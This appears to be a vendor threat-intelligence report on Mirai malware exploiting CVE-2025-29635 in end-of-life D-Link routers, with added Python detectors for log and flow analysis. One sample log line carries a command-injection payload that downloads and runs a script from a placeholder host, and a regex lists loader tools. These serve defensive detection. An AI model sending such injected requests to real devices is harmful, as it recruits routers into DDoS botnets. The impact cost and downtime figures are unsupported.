Executive Summary
In March 2026, Akamai's Security Intelligence and Response Team (SIRT) identified active exploitation of CVE-2025-29635, a command injection vulnerability in D-Link DIR-823X routers, by a new Mirai-based malware campaign. Attackers are sending POST requests to the vulnerable endpoint, executing remote commands to download and install a Mirai variant named "tuxnokill," which enables the compromised devices to perform distributed denial-of-service (DDoS) attacks. This marks the first observed in-the-wild exploitation of this vulnerability since its disclosure in March 2025. (akamai.com)
The exploitation of end-of-life (EoL) devices underscores the need for organizations to retire hardware that will no longer receive vendor fixes, and to apply security patches promptly where a supported device has one. The resurgence of Mirai variants targeting unpatched IoT devices highlights the ongoing threat posed by botnets that rely on publicly known vulnerabilities rather than novel ones. (bleepingcomputer.com)
Why This Matters Now
The active exploitation of CVE-2025-29635 in D-Link DIR-823X routers by Mirai-based malware emphasizes the urgency for organizations to decommission EoL devices and ensure all network equipment is up-to-date. Failure to do so increases the risk of devices being co-opted into botnets, leading to potential DDoS attacks and network compromises.
Attack Path Analysis
Attackers exploited a command injection vulnerability in D-Link DIR-823X routers to gain initial access. They then executed arbitrary commands to download and install a Mirai-based malware. Because the injected command runs with the privileges of the router's web service, which on this class of device is usually root, no separate privilege-escalation step was needed. The malware established command and control channels, enabling attackers to orchestrate DDoS attacks. No evidence of lateral movement or data exfiltration was observed. The primary impact was the enlistment of compromised devices into the botnet for DDoS activities.
Kill Chain Progression
Initial Compromise
Description
Attackers exploited CVE-2025-29635, a command injection vulnerability in D-Link DIR-823X routers, by sending specially crafted POST requests to the /goform/set_prohibiting endpoint, allowing remote code execution.
Related CVEs
CVE-2025-29635
CVSS 8.8. A command injection vulnerability in D-Link DIR-823X firmware versions 240126 and 240802 allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to the /goform/set_prohibiting endpoint.
Affected Products:
D-Link DIR-823X – 240126, 240802
Exploit Status:
exploited in the wild
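A detection-side illustration of the initial compromise step above, added here as an example and not code from Akamai, D-Link, or the cited reports: a small Python classifier that scans HTTP request records for POSTs to /goform/set_prohibiting whose parameter values carry shell metacharacters or Mirai-style download commands. The log format (tab-separated client IP, method, path, raw body), the parameter names `mac` and `name`, and all IP addresses and URLs in the sample are constructed assumptions for illustration; the vulnerable parameter in the real firmware is not named by the page.

```python
"""Flag HTTP requests that look like exploitation attempts against the
D-Link DIR-823X /goform/set_prohibiting endpoint (CVE-2025-29635).

Added example, not vendor or researcher code. The log format, the
parameter names and every address below are constructed for illustration.
"""
import re
from urllib.parse import parse_qs

VULN_PATH = "/goform/set_prohibiting"

# Characters that let a parameter value break out of the intended command.
META = re.compile(r"[;&|`$\n]")
# Download-and-execute fragments typical of Mirai-style loaders.
LOADER = re.compile(r"\b(wget|curl|tftp|ftpget|busybox)\b|\bchmod\s+(\+x|[0-7]+)", re.I)


def classify_request(method, path, body):
    """Return the reasons a request is suspicious (empty list if benign).

    parse_qs is applied to the raw body so that an encoded '&' (%26) inside
    an injected value stays inside that value instead of splitting it.
    """
    reasons = []
    if method.upper() != "POST" or path.split("?", 1)[0] != VULN_PATH:
        return reasons
    params = parse_qs(body, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            if META.search(value):
                reasons.append(f"shell metacharacter in parameter '{name}'")
            if LOADER.search(value):
                reasons.append(f"loader command in parameter '{name}'")
    return reasons


def scan_log(text):
    """Parse tab-separated request records and return [(client_ip, reasons)] for hits."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split("\t", 3)
        parts += [""] * (4 - len(parts))      # tolerate a missing body field
        ip, method, path, body = parts
        reasons = classify_request(method, path, body)
        if reasons:
            hits.append((ip, reasons))
    return hits


# Constructed sample records: one benign update, one loader injection,
# one backtick injection, and a GET that is not an exploitation attempt.
SAMPLE_LOG = (
    "203.0.113.7\tPOST\t/goform/set_prohibiting\tmac=00:11:22:33:44:55&name=laptop\n"
    "203.0.113.9\tPOST\t/goform/set_prohibiting\t"
    "mac=00:11:22:33:44:55;wget+http://192.0.2.10/x.sh+-O+/tmp/x.sh;sh+/tmp/x.sh&name=a\n"
    "198.51.100.4\tPOST\t/goform/set_prohibiting\tmac=%60id%60&name=b\n"
    "198.51.100.5\tGET\t/goform/set_prohibiting\t\n"
)

if __name__ == "__main__":
    for ip, reasons in scan_log(SAMPLE_LOG):
        print(ip, "->", "; ".join(reasons))
```

An inline IPS signature for this campaign would anchor on the same two things, the URI and a metacharacter inside a parameter value. For an EoL device the safer control is to stop POSTs to this endpoint from untrusted networks altogether, since no legitimate WAN-side client has a reason to reach it.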
MITRE ATT&CK® Techniques
Exploit Public-Facing Application
Command and Scripting Interpreter: Unix Shell
Ingress Tool Transfer
Resource Hijacking
Network Denial of Service
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Ensure that all system components and software are protected from known vulnerabilities by installing applicable vendor-supplied security patches.
Control ID: 6.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – Asset Management
Control ID: 2.1
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Telecommunications
High-risk sector using vulnerable D-Link routers for network infrastructure, facing botnet recruitment and DDoS attacks compromising service availability and customer connectivity.
Information Technology/IT
Exposure through end-of-life routers at the edge of managed client networks. In this campaign the compromised devices were used for DDoS, and no lateral movement or data exfiltration was observed; an attacker with a shell on a customer gateway is nonetheless positioned to pivot into the network behind it, so each affected device should be treated as a potential foothold, not only as a DDoS node.
Financial Services
Potential compliance findings, since a botnet-controlled router on the network edge undermines the egress controls and zero-trust segmentation that sector regulations require, and an EoL device with a known exploited vulnerability is itself a patch-management gap under those frameworks.
Health Care / Life Sciences
Potential HIPAA exposure where a compromised network device sits in front of systems handling patient data. This campaign showed only DDoS activity, but the same shell access that installs the bot could be used for unauthorized access or exfiltration, so affected devices should be isolated and replaced.
Sources
- New Mirai campaign exploits RCE flaw in EoL D-Link routers: https://www.bleepingcomputer.com/news/security/new-mirai-campaign-exploits-rce-flaw-in-eol-d-link-routers/
- NVD - CVE-2025-29635: https://nvd.nist.gov/vuln/detail/CVE-2025-29635
- CVE-2025-29635: Mirai Campaign Targets D-Link Devices | Akamai: https://www.akamai.com/blog/security-research/cve-2025-29635-mirai-campaign-targets-d-link-devices
- D-Link Technical Support Announcement SAP10469: https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10469
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Aviatrix Zero Trust CNSF is pertinent to this incident as it could have limited the attacker's ability to exploit vulnerabilities and control compromised devices, thereby reducing the overall impact of the attack.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: The attacker's ability to exploit the command injection vulnerability may have been constrained, reducing the likelihood of successful remote code execution.
Control: Zero Trust Segmentation
Mitigation: The attacker's ability to escalate privileges and install malware could have been limited, reducing the scope of the compromise.
Control: East-West Traffic Security
Mitigation: If lateral movement had been attempted, it would likely have been constrained, reducing the potential for further compromise.
Control: Multicloud Visibility & Control
Mitigation: The attacker's ability to establish and maintain command and control channels may have been limited, reducing their control over compromised devices.
Control: Egress Security & Policy Enforcement
Mitigation: If data exfiltration had been attempted, it would likely have been constrained, reducing the risk of data loss.
The overall impact of the attack could have been reduced, limiting the number of devices available for the botnet and the scale of the DDoS attacks.
Impact at a Glance
Affected Business Functions
- Network Security
- Internet Connectivity
Estimated downtime: 3 days
Estimated loss: $50,000
Potential exposure of network configurations and connected device information.
Recommended Actions
Key Takeaways & Next Steps
- Implement inline intrusion prevention systems (IPS) to detect and block exploitation attempts targeting known vulnerabilities.
- Enforce egress security and policy enforcement to control outbound traffic and prevent unauthorized communications with external command and control servers.
- Enhance threat detection and anomaly response capabilities to identify and respond to unusual network activities indicative of malware infections.
- Apply zero trust segmentation to limit the potential impact of compromised devices by restricting their access to critical network resources.
- Regularly update and patch network devices to address known vulnerabilities and reduce the attack surface.
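The egress and anomaly-detection items above, worked through on flow records as an added example (not code from the cited vendors or researchers): a router that has been recruited by a Mirai variant first fetches the bot from a host outside any sanctioned destination, then opens connections to many distinct targets in a short window. The script applies an egress allowlist to catch the first behaviour and a fan-out threshold to catch the second. The allowlist entries, the flow record layout, the thresholds and all addresses are constructed assumptions for illustration.

```python
"""Spot a SOHO router recruited into a DDoS botnet from outbound flow records.

Added example, not vendor or researcher code. Two heuristics:
  1. Egress policy: the router segment may only reach an allowlisted set of
     (destination, port, protocol); a loader download or C2 beacon falls
     outside it.
  2. Fan-out: a source that contacts more than FANOUT_LIMIT distinct
     destinations within FANOUT_WINDOW seconds behaves like a DDoS node.
Allowlist, thresholds, record layout and every address are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: int      # seconds since epoch (constructed)
    src: str
    dst: str
    dport: int
    proto: str


# Assumed egress policy: resolver, time source and a vendor update host only.
ALLOWED = {
    ("192.0.2.53", 53, "udp"),
    ("192.0.2.123", 123, "udp"),
    ("192.0.2.80", 443, "tcp"),
}
FANOUT_WINDOW = 60   # seconds
FANOUT_LIMIT = 20    # distinct destinations inside the window


def policy_violations(flows):
    """Map each source to the sorted, de-duplicated destinations it reached off-policy."""
    out = defaultdict(set)
    for f in flows:
        if (f.dst, f.dport, f.proto) not in ALLOWED:
            out[f.src].add((f.dst, f.dport, f.proto))
    return {src: sorted(dsts) for src, dsts in out.items()}


def fanout_offenders(flows, window=FANOUT_WINDOW, limit=FANOUT_LIMIT):
    """Return sources that hit more than `limit` distinct destinations in any `window` seconds."""
    by_src = defaultdict(list)
    for f in flows:
        by_src[f.src].append((f.ts, f.dst))
    offenders = set()
    for src, events in by_src.items():
        events.sort()
        for i, (t0, _) in enumerate(events):          # sliding window from each event
            dsts = {d for t, d in events[i:] if t - t0 <= window}
            if len(dsts) > limit:
                offenders.add(src)
                break
    return sorted(offenders)


def report(flows):
    """Combine both heuristics into one dict of findings per source."""
    findings = defaultdict(list)
    for src, dsts in policy_violations(flows).items():
        findings[src].append(f"{len(dsts)} off-policy destination(s)")
    for src in fanout_offenders(flows):
        findings[src].append("fan-out consistent with DDoS/scanning")
    return dict(findings)


# Constructed sample: 10.0.0.1 behaves normally; 10.0.0.2 fetches a loader
# from an unsanctioned host, then floods 25 distinct targets in 25 seconds.
SAMPLE_FLOWS = [
    Flow(100, "10.0.0.1", "192.0.2.53", 53, "udp"),
    Flow(101, "10.0.0.1", "192.0.2.123", 123, "udp"),
    Flow(102, "10.0.0.1", "192.0.2.80", 443, "tcp"),
    Flow(100, "10.0.0.2", "198.51.100.77", 80, "tcp"),
] + [Flow(200 + i, "10.0.0.2", f"203.0.113.{i + 1}", 80, "tcp") for i in range(25)]

if __name__ == "__main__":
    for src, notes in report(SAMPLE_FLOWS).items():
        print(src, "->", "; ".join(notes))
```

On a real network the allowlist would come from the segment's firewall policy and the flows from NetFlow/IPFIX or firewall logs; the point is that both signals are available without inspecting the router itself, which matters for EoL devices that offer no endpoint telemetry.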